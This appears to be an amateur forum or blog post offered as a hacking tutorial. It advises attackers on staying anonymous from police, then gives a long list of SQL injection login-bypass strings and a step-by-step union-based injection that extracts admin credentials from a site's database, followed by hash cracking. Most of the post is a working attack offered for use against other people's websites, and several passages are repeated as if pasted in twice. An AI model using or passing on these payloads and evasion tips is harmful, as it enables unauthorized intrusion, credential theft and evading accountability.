Hello every one this is Tut About Hacking i will try to make it easy and Detailed if i typed anything wrong please correct me
at first i must say thnx to every one who helped me to know allot about hacking
vishal ,almas,manjot,parth,ghosty bro and allot how gives me every advice i need
at this tut we gonna know about
1-what is the hacker
2-how to be anonymous
3-SQL injection
------------------------------------------------------------------
1-what is the hacker
hacker
this is someone who wanna to break down your security system to get something from your website or computer or just someone how wanna let you know that's your security is shit with his way
and there are 3 kind of hackers
at first i must say thnx to every one who helped me to know allot about hacking
vishal ,almas,manjot,parth,ghosty bro and allot how gives me every advice i need
at this tut we gonna know about
1-what is the hacker
2-how to be anonymous
3-SQL injection
------------------------------------------------------------------
1-what is the hacker
hacker
this is someone who wanna to break down your security system to get something from your website or computer or just someone how wanna let you know that's your security is shit with his way
and there are 3 kind of hackers
Code:
1-whit hat hacker
2- gray hat hacker
3- black hat hackerwe not gonna talk alot about this but just to let you know :)
-----------------------------------------------------------
2- how to be anonymous
dont try to hack into sys without being anonymous or you gonna catch by the police okay how to do that
well it's easy to be anonymous you have to do this steps and you gonna disappear
Code:
1- use VPS or use RDP or use proxy i preferring to use all of it at the same time this gonna make you anonymous
2- dont open any of your personal things like ( your own Facebook , twitter , e-mail) or you gonna be in a big trouble
3- dont till any one about your real identity ( alot of hackers working together for years and they even dont know they talk to man or woman XD but this is how it works )if you did this steps you gonna be anonymous
---------------------------------------------------------------------
part 3 SQL Injection
well im not gonna add everything now cuz i still learning every day so excuse me if i type something wrong + excuse me for my bad English :)
how to inject admin page or ( how to bypass is )
well when i was learn this is the first thing i did know about SQLI so i must till you it's not working with all websites but you gonna find it useful
if we have site
---------------------------------------------------------------------
part 3 SQL Injection
well im not gonna add everything now cuz i still learning every day so excuse me if i type something wrong + excuse me for my bad English :)
how to inject admin page or ( how to bypass is )
well when i was learn this is the first thing i did know about SQLI so i must till you it's not working with all websites but you gonna find it useful
if we have site
Code:
www.site.com/admin.phpnow we gonna have to box's ( username,password)
what we gonna do is typing query that's can be executed in login page
we gonna type
at username box : admin or root
at password box :
we have big list to try it out im sure one of it gonna work
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'credits gos to Zer0Freak Topic
okay this is way from alot of ways to break into website
---------------------------------------------------------
now we gonna learn another way it's more than good to pawn a website
it's union based injection
okay now we have a website like this
Code:
www.site.com/buy.php?category=10to know if this site vulnerably or no we gonna add (') at the end of url
Code:
www.site.com/buy.php?category=10'well there are allot of errors may appear but we gonna work on this error
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1if we got this error then im sure the site is vulnerable let's start to break it
we gonna add to sure
Code:
order by a--well this query make us able to know number or columns oh btw "a"= number of column's that's we gonna try to know let's see how it work
Code:
www.site.com/buy.php?category=10 order by 20--if we have error like this
Unknown column '20'
then it's wrong number of columns so lets try to make it less than 20
Code:
www.site.com/buy.php?category=10 order by 15--no error let's make sure that's we have the right number of columns
Code:
www.site.com/buy.php?category=10 order by 16--error then the right number is 15 now we know number of columns and we need to collect it
so let's use union select
how it work union select make us able to collect all tables in one order
let's see how it work
Code:
www.site.com/buy.php?category=10 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--now the page gonna show us number this numbers is (vulnerable columns )
but what of this numbers are the right number to inject well let's say you sow this
but what of this numbers are the right number to inject well let's say you sow this
Code:
12
5
4you gonna inject the number at the top
so now we need to know version of DB we gonna type
so now we need to know version of DB we gonna type
Code:
www.site.com/buy.php?category=10 union select 1,2,3,4,5,6,7,8,9,10,11,@@version,13,14,15--you well replace the vulnerable column with @@version statement like what i did
so the page gonna show you this
Code:
5.1.61-0or what ever DB number
Notice: if you fund DB version less than 5 then let the site alone cuz you are not able to inject it now im gonna make tut about how to guess the table's of DB version less than 5
now we gonna use group_concat this make you able to collect all info you need so let's see how it works
we gonna try to get table name with group_concat
Notice: if you fund DB version less than 5 then let the site alone cuz you are not able to inject it now im gonna make tut about how to guess the table's of DB version less than 5
now we gonna use group_concat this make you able to collect all info you need so let's see how it works
we gonna try to get table name with group_concat
Code:
www.site.com/buy.php?category=10 union select 1,2,3,4,5,6,7,8,9,10,11,group_concat(table_name),13,14,15 from information_schema.tables where table_schema=database()--we add after the last column this
Code:
from information_schema.tables where table_schema=database()--Code:
table,tableadmin,tableup,phonenumbers,table,websitenow we got website tables name now we have to find table the have admin info that's mean we gonna try to get into (tableadmin)
now we gonna replace group_concat(table_name) with group_concat(column_name)
and replace from information_schema.tables where table_schema=database()--
with from information_schema.columns where table_name=0x
okay now our syntax gonna be like that
Code:
www.site.com/buy.php?category=10 union select 1,2,3,4,5,6,7,8,9,10,11,group_concat(column_name),13,14,15 from information_schema.columns where table_name=0xwe replaced database with 0x cuz this make hex readable to our website
ow we gonna add table name but with hex so it gonna be like this
7461626c6561646d696e
in order to make hex use this website
Code:
http://www.swingnote.comnow we got the columns from table admin we got
Code:
id,username,passwordnow we need to extract it to know all the infor we need to login
so we gonna replace group_concat(coumn_name) with group_concat(id,username,password)
and at the end we gonna replace
so we gonna replace group_concat(coumn_name) with group_concat(id,username,password)
and at the end we gonna replace
Code:
from information_schema.columns where table_name=0x7461626c6561646d696ewith
Code:
from tableadmin--now we see at the page user id and username and password
1:admin:admin
if we got hash password then use
http://www.md5.net
to crack it and there are allot more
i hope you like this tut guys and sorry for my bad english
waiting for your comments
0 comments:
Post a Comment